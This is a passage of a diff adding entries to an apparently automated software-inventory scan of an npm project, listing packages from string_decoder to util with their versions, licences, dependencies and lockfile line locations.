"string_decoder@1.3.0", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.3.0", + "UID": "d4355443b4991078" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 20106, + "EndLine": 20114 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-ansi@3.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@3.0.1", + "UID": "de4133134e9f0f3c" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@2.1.1" + ], + "Locations": [ + { + "StartLine": 17437, + "EndLine": 17448 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-ansi@5.2.0", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@5.2.0", + "UID": "6a82dcc5800f65f5" + }, + "Version": "5.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@4.1.1" + ], + "Locations": [ + { + "StartLine": 5921, + "EndLine": 5933 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-ansi@6.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@6.0.1", + "UID": "310f38c9f4b02ffd" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@5.0.1" + ], + "Locations": [ + { + "StartLine": 15642, + "EndLine": 15654 + }, + { + "StartLine": 15655, + "EndLine": 15668 + }, + { + "StartLine": 20287, + "EndLine": 20298 + }, + { + "StartLine": 20299, + "EndLine": 20311 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-ansi@7.1.2", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@7.1.2", + "UID": "a94c1b82d6a90970" + }, + "Version": "7.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@6.2.2" + ], + "Locations": [ + { + "StartLine": 3375, + "EndLine": 3389 + }, + { + "StartLine": 13602, + "EndLine": 13617 + }, + { + "StartLine": 15954, + "EndLine": 15969 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-final-newline@2.0.0", + "Name": "strip-final-newline", + "Identifier": { + "PURL": "pkg:npm/strip-final-newline@2.0.0", + "UID": "bc10c259708fdda8" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20322, + "EndLine": 20330 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-indent@3.0.0", + "Name": "strip-indent", + "Identifier": { + "PURL": "pkg:npm/strip-indent@3.0.0", + "UID": "101db3550303f306" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "min-indent@1.0.1" + ], + "Locations": [ + { + "StartLine": 20331, + "EndLine": 20342 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strip-json-comments@2.0.1", + "Name": "strip-json-comments", + "Identifier": { + "PURL": "pkg:npm/strip-json-comments@2.0.1", + "UID": "f358e5fef1aba34f" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17148, + "EndLine": 17156 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "strnum@1.1.2", + "Name": "strnum", + "Identifier": { + "PURL": "pkg:npm/strnum@1.1.2", + "UID": "3fa29378ab21d02a" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20356, + "EndLine": 20367 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "supports-color@10.2.2", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@10.2.2", + "UID": "c1d135571ef9ecd3" + }, + "Version": "10.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15669, + "EndLine": 15681 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "supports-color@5.5.0", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@5.5.0", + "UID": "6e0e692f264bf27a" + }, + "Version": "5.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-flag@3.0.0" + ], + "Locations": [ + { + "StartLine": 557, + "EndLine": 568 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "supports-color@7.2.0", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@7.2.0", + "UID": "2c8d65b5b002967f" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-flag@4.0.0" + ], + "Locations": [ + { + "StartLine": 20368, + "EndLine": 20379 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "supports-color@8.1.1", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@8.1.1", + "UID": "567fb10103d06e3" + }, + "Version": "8.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-flag@4.0.0" + ], + "Locations": [ + { + "StartLine": 11576, + "EndLine": 11590 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "supports-preserve-symlinks-flag@1.0.0", + "Name": "supports-preserve-symlinks-flag", + "Identifier": { + "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", + "UID": "c1a603b53f5a52f0" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20380, + "EndLine": 20391 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "svg-parser@2.0.4", + "Name": "svg-parser", + "Identifier": { + "PURL": "pkg:npm/svg-parser@2.0.4", + "UID": "aa149eec2de4c49e" + }, + "Version": "2.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20392, + "EndLine": 20397 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "svgo@3.3.2", + "Name": "svgo", + "Identifier": { + "PURL": "pkg:npm/svgo@3.3.2", + "UID": "799b27abaf83d459" + }, + "Version": "3.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@trysound/sax@0.2.0", + "commander@7.2.0", + "css-select@5.2.2", + "css-tree@2.3.1", + "css-what@6.2.2", + "csso@5.0.5", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 20398, + "EndLine": 20422 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tar@6.2.1", + "Name": "tar", + "Identifier": { + "PURL": "pkg:npm/tar@6.2.1", + "UID": "769cdab53da6940b" + }, + "Version": "6.2.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "chownr@2.0.0", + "fs-minipass@2.1.0", + "minipass@5.0.0", + "minizlib@2.1.2", + "mkdirp@1.0.4", + "yallist@4.0.0" + ], + "Locations": [ + { + "StartLine": 20451, + "EndLine": 20468 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tar@7.5.1", + "Name": "tar", + "Identifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "a31b88ca9e9fafdc" + }, + "Version": "7.5.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/fs-minipass@4.0.1", + "chownr@3.0.0", + "minipass@7.1.2", + "minizlib@3.1.0", + "yallist@5.0.0" + ], + "Locations": [ + { + "StartLine": 15682, + "EndLine": 15696 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tar-fs@2.1.4", + "Name": "tar-fs", + "Identifier": { + "PURL": "pkg:npm/tar-fs@2.1.4", + "UID": "9ff520796b52f3f7" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "chownr@1.1.4", + "mkdirp-classic@0.5.3", + "pump@3.0.3", + "tar-stream@2.2.0" + ], + "Locations": [ + { + "StartLine": 16814, + "EndLine": 16825 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tar-fs@3.1.1", + "Name": "tar-fs", + "Identifier": { + "PURL": "pkg:npm/tar-fs@3.1.1", + "UID": "30ffbff3d12a447" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bare-fs@4.4.5", + "bare-path@3.0.0", + "pump@3.0.3", + "tar-stream@3.1.7" + ], + "Locations": [ + { + "StartLine": 20469, + "EndLine": 20482 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tar-stream@2.2.0", + "Name": "tar-stream", + "Identifier": { + "PURL": "pkg:npm/tar-stream@2.2.0", + "UID": "ad808f15f3e6c001" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bl@4.1.0", + "end-of-stream@1.4.5", + "fs-constants@1.0.0", + "inherits@2.0.4", + "readable-stream@3.6.2" + ], + "Locations": [ + { + "StartLine": 16826, + "EndLine": 16841 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tar-stream@3.1.7", + "Name": "tar-stream", + "Identifier": { + "PURL": "pkg:npm/tar-stream@3.1.7", + "UID": "90c94c13f910f8bd" + }, + "Version": "3.1.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "b4a@1.7.3", + "fast-fifo@1.3.2", + "streamx@2.23.0" + ], + "Locations": [ + { + "StartLine": 20483, + "EndLine": 20493 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "terser@5.44.0", + "Name": "terser", + "Identifier": { + "PURL": "pkg:npm/terser@5.44.0", + "UID": "b53845c2d4e0432e" + }, + "Version": "5.44.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/source-map@0.3.11", + "acorn@8.15.0", + "commander@2.20.3", + "source-map-support@0.5.21" + ], + "Locations": [ + { + "StartLine": 20521, + "EndLine": 20538 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "test-exclude@6.0.0", + "Name": "test-exclude", + "Identifier": { + "PURL": "pkg:npm/test-exclude@6.0.0", + "UID": "57e95fc18e4119c0" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@istanbuljs/schema@0.1.3", + "glob@7.2.3", + "minimatch@3.1.2" + ], + "Locations": [ + { + "StartLine": 20555, + "EndLine": 20568 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "text-decoder@1.2.3", + "Name": "text-decoder", + "Identifier": { + "PURL": "pkg:npm/text-decoder@1.2.3", + "UID": "14ea812861efe47a" + }, + "Version": "1.2.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "b4a@1.7.3" + ], + "Locations": [ + { + "StartLine": 20591, + "EndLine": 20599 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "text-segmentation@1.0.3", + "Name": "text-segmentation", + "Identifier": { + "PURL": "pkg:npm/text-segmentation@1.0.3", + "UID": "e106e448662fe86f" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "utrie@1.0.2" + ], + "Locations": [ + { + "StartLine": 20600, + "EndLine": 20608 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "text-table@0.2.0", + "Name": "text-table", + "Identifier": { + "PURL": "pkg:npm/text-table@0.2.0", + "UID": "30cc95832c68924a" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15705, + "EndLine": 15711 + }, + { + "StartLine": 20609, + "EndLine": 20615 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "throat@5.0.0", + "Name": "throat", + "Identifier": { + "PURL": "pkg:npm/throat@5.0.0", + "UID": "b74ab66e2eac7efa" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20616, + "EndLine": 20621 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tiny-queue@0.2.1", + "Name": "tiny-queue", + "Identifier": { + "PURL": "pkg:npm/tiny-queue@0.2.1", + "UID": "5a504f208e066ee7" + }, + "Version": "0.2.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20622, + "EndLine": 20627 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tiny-relative-date@2.0.2", + "Name": "tiny-relative-date", + "Identifier": { + "PURL": "pkg:npm/tiny-relative-date@2.0.2", + "UID": "29661be603848659" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15712, + "EndLine": 15718 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tinyglobby@0.2.15", + "Name": "tinyglobby", + "Identifier": { + "PURL": "pkg:npm/tinyglobby@0.2.15", + "UID": "3d7d427136e8dc05" + }, + "Version": "0.2.15", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fdir@6.5.0", + "picomatch@4.0.3" + ], + "Locations": [ + { + "StartLine": 15719, + "EndLine": 15735 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tmpl@1.0.5", + "Name": "tmpl", + "Identifier": { + "PURL": "pkg:npm/tmpl@1.0.5", + "UID": "9c14aa28b5485d7" + }, + "Version": "1.0.5", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20638, + "EndLine": 20643 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "to-regex-range@5.0.1", + "Name": "to-regex-range", + "Identifier": { + "PURL": "pkg:npm/to-regex-range@5.0.1", + "UID": "559a8ff4296cf1a7" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-number@7.0.0" + ], + "Locations": [ + { + "StartLine": 20644, + "EndLine": 20655 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "toidentifier@1.0.1", + "Name": "toidentifier", + "Identifier": { + "PURL": "pkg:npm/toidentifier@1.0.1", + "UID": "e73b4344b140bafa" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20656, + "EndLine": 20664 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "treeverse@3.0.0", + "Name": "treeverse", + "Identifier": { + "PURL": "pkg:npm/treeverse@3.0.0", + "UID": "daf33512326529e9" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 15765, + "EndLine": 15774 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "trim-newlines@3.0.1", + "Name": "trim-newlines", + "Identifier": { + "PURL": "pkg:npm/trim-newlines@3.0.1", + "UID": "af81b6a28c57499e" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20665, + "EndLine": 20673 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ts-dedent@2.2.0", + "Name": "ts-dedent", + "Identifier": { + "PURL": "pkg:npm/ts-dedent@2.2.0", + "UID": "43870a170a46e3b5" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20687, + "EndLine": 20695 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tslib@2.8.1", + "Name": "tslib", + "Identifier": { + "PURL": "pkg:npm/tslib@2.8.1", + "UID": "7f73c280e0bbd63c" + }, + "Version": "2.8.1", + "Licenses": [ + "0BSD" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 2432, + "EndLine": 2437 + }, + { + "StartLine": 2470, + "EndLine": 2475 + }, + { + "StartLine": 2482, + "EndLine": 2487 + }, + { + "StartLine": 2542, + "EndLine": 2547 + }, + { + "StartLine": 2560, + "EndLine": 2565 + }, + { + "StartLine": 2582, + "EndLine": 2587 + }, + { + "StartLine": 2594, + "EndLine": 2599 + }, + { + "StartLine": 2643, + "EndLine": 2648 + }, + { + "StartLine": 2665, + "EndLine": 2670 + }, + { + "StartLine": 2684, + "EndLine": 2689 + }, + { + "StartLine": 2706, + "EndLine": 2711 + }, + { + "StartLine": 2747, + "EndLine": 2752 + }, + { + "StartLine": 2763, + "EndLine": 2768 + }, + { + "StartLine": 2809, + "EndLine": 2814 + }, + { + "StartLine": 2825, + "EndLine": 2830 + }, + { + "StartLine": 2870, + "EndLine": 2875 + }, + { + "StartLine": 2882, + "EndLine": 2887 + }, + { + "StartLine": 2919, + "EndLine": 2924 + }, + { + "StartLine": 2934, + "EndLine": 2939 + }, + { + "StartLine": 2952, + "EndLine": 2957 + }, + { + "StartLine": 2990, + "EndLine": 2995 + }, + { + "StartLine": 3002, + "EndLine": 3007 + }, + { + "StartLine": 3042, + "EndLine": 3047 + }, + { + "StartLine": 3054, + "EndLine": 3059 + }, + { + "StartLine": 3093, + "EndLine": 3098 + }, + { + "StartLine": 3105, + "EndLine": 3110 + }, + { + "StartLine": 3147, + "EndLine": 3152 + }, + { + "StartLine": 3163, + "EndLine": 3168 + }, + { + "StartLine": 3182, + "EndLine": 3187 + }, + { + "StartLine": 8033, + "EndLine": 8038 + }, + { + "StartLine": 12089, + "EndLine": 12094 + }, + { + "StartLine": 13166, + "EndLine": 13171 + }, + { + "StartLine": 19777, + "EndLine": 19782 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tuf-js@4.0.0", + "Name": "tuf-js", + "Identifier": { + "PURL": "pkg:npm/tuf-js@4.0.0", + "UID": "4cfdb0fb63a183ba" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@tufjs/models@4.0.0", + "debug@4.4.3", + "make-fetch-happen@15.0.2" + ], + "Locations": [ + { + "StartLine": 15775, + "EndLine": 15787 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "tunnel-agent@0.6.0", + "Name": "tunnel-agent", + "Identifier": { + "PURL": "pkg:npm/tunnel-agent@0.6.0", + "UID": "a373d88c1d5de1f1" + }, + "Version": "0.6.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 20719, + "EndLine": 20730 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "type-detect@4.0.8", + "Name": "type-detect", + "Identifier": { + "PURL": "pkg:npm/type-detect@4.0.8", + "UID": "8fcecd5e8f0d5f3a" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20744, + "EndLine": 20752 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "type-fest@0.18.1", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.18.1", + "UID": "d7deda24ee27105b" + }, + "Version": "0.18.1", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12342, + "EndLine": 12353 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "type-fest@0.6.0", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.6.0", + "UID": "59ebc5635ae71160" + }, + "Version": "0.6.0", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18889, + "EndLine": 18897 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "type-fest@0.7.1", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.7.1", + "UID": "332be6e3af6741a" + }, + "Version": "0.7.1", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20045, + "EndLine": 20053 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "type-fest@0.8.1", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.8.1", + "UID": "9bdb2c9c3c264141" + }, + "Version": "0.8.1", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 18853, + "EndLine": 18861 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "type-is@1.6.18", + "Name": "type-is", + "Identifier": { + "PURL": "pkg:npm/type-is@1.6.18", + "UID": "161fac58e3f05330" + }, + "Version": "1.6.18", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "media-typer@0.3.0", + "mime-types@2.1.35" + ], + "Locations": [ + { + "StartLine": 20766, + "EndLine": 20779 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ua-parser-js@0.7.41", + "Name": "ua-parser-js", + "Identifier": { + "PURL": "pkg:npm/ua-parser-js@0.7.41", + "UID": "4bc86d584950d7f5" + }, + "Version": "0.7.41", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20872, + "EndLine": 20897 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "uc.micro@1.0.6", + "Name": "uc.micro", + "Identifier": { + "PURL": "pkg:npm/uc.micro@1.0.6", + "UID": "da3a213db8b0fd87" + }, + "Version": "1.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20898, + "EndLine": 20903 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "undici-types@7.14.0", + "Name": "undici-types", + "Identifier": { + "PURL": "pkg:npm/undici-types@7.14.0", + "UID": "f4875e8dfc7dd5b6" + }, + "Version": "7.14.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20923, + "EndLine": 20928 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unicode-canonical-property-names-ecmascript@2.0.1", + "Name": "unicode-canonical-property-names-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-canonical-property-names-ecmascript@2.0.1", + "UID": "b1f487b64ff5f8db" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20929, + "EndLine": 20937 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unicode-match-property-ecmascript@2.0.0", + "Name": "unicode-match-property-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-match-property-ecmascript@2.0.0", + "UID": "152e768f6a7f6108" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "unicode-canonical-property-names-ecmascript@2.0.1", + "unicode-property-aliases-ecmascript@2.2.0" + ], + "Locations": [ + { + "StartLine": 20938, + "EndLine": 20950 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unicode-match-property-value-ecmascript@2.2.1", + "Name": "unicode-match-property-value-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-match-property-value-ecmascript@2.2.1", + "UID": "3a286b89e38a81e" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20951, + "EndLine": 20959 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unicode-property-aliases-ecmascript@2.2.0", + "Name": "unicode-property-aliases-ecmascript", + "Identifier": { + "PURL": "pkg:npm/unicode-property-aliases-ecmascript@2.2.0", + "UID": "6075d1c39bfce75e" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20960, + "EndLine": 20968 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unique-filename@1.1.1", + "Name": "unique-filename", + "Identifier": { + "PURL": "pkg:npm/unique-filename@1.1.1", + "UID": "16a95b41c48a6705" + }, + "Version": "1.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "unique-slug@2.0.2" + ], + "Locations": [ + { + "StartLine": 20969, + "EndLine": 20978 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unique-filename@4.0.0", + "Name": "unique-filename", + "Identifier": { + "PURL": "pkg:npm/unique-filename@4.0.0", + "UID": "54f5356afe621255" + }, + "Version": "4.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "unique-slug@5.0.0" + ], + "Locations": [ + { + "StartLine": 15788, + "EndLine": 15798 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unique-slug@2.0.2", + "Name": "unique-slug", + "Identifier": { + "PURL": "pkg:npm/unique-slug@2.0.2", + "UID": "8b03a55bac460134" + }, + "Version": "2.0.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "imurmurhash@0.1.4" + ], + "Locations": [ + { + "StartLine": 20979, + "EndLine": 20988 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unique-slug@5.0.0", + "Name": "unique-slug", + "Identifier": { + "PURL": "pkg:npm/unique-slug@5.0.0", + "UID": "e5649e60f6c5e31f" + }, + "Version": "5.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "imurmurhash@0.1.4" + ], + "Locations": [ + { + "StartLine": 15799, + "EndLine": 15809 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "universalify@0.1.2", + "Name": "universalify", + "Identifier": { + "PURL": "pkg:npm/universalify@0.1.2", + "UID": "14a263b02db95d23" + }, + "Version": "0.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20989, + "EndLine": 20997 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "universalify@2.0.1", + "Name": "universalify", + "Identifier": { + "PURL": "pkg:npm/universalify@2.0.1", + "UID": "933eff322a45e2af" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 16481, + "EndLine": 16490 + }, + { + "StartLine": 17671, + "EndLine": 17679 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "unpipe@1.0.0", + "Name": "unpipe", + "Identifier": { + "PURL": "pkg:npm/unpipe@1.0.0", + "UID": "5b6cbebd20aafc8a" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 20998, + "EndLine": 21006 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "update-browserslist-db@1.1.3", + "Name": "update-browserslist-db", + "Identifier": { + "PURL": "pkg:npm/update-browserslist-db@1.1.3", + "UID": "d2604c9f7e10ad89" + }, + "Version": "1.1.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "browserslist@4.26.3", + "escalade@3.2.0", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 21007, + "EndLine": 21036 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "use-latest-callback@0.2.5", + "Name": "use-latest-callback", + "Identifier": { + "PURL": "pkg:npm/use-latest-callback@0.2.5", + "UID": "15cbdbe806497b6a" + }, + "Version": "0.2.5", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 21047, + "EndLine": 21055 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "use-sync-external-store@1.6.0", + "Name": "use-sync-external-store", + "Identifier": { + "PURL": "pkg:npm/use-sync-external-store@1.6.0", + "UID": "464cb74fb1c1d423" + }, + "Version": "1.6.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "react@19.1.0" + ], + "Locations": [ + { + "StartLine": 21056, + "EndLine": 21064 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "utf8@3.0.0", + "Name": "utf8", + "Identifier": { + "PURL": "pkg:npm/utf8@3.0.0", + "UID": "549b0a1a32fedbe1" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 21065, + "EndLine": 21070 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "util@0.12.5", + "Name": "util", + "Identifier": { + 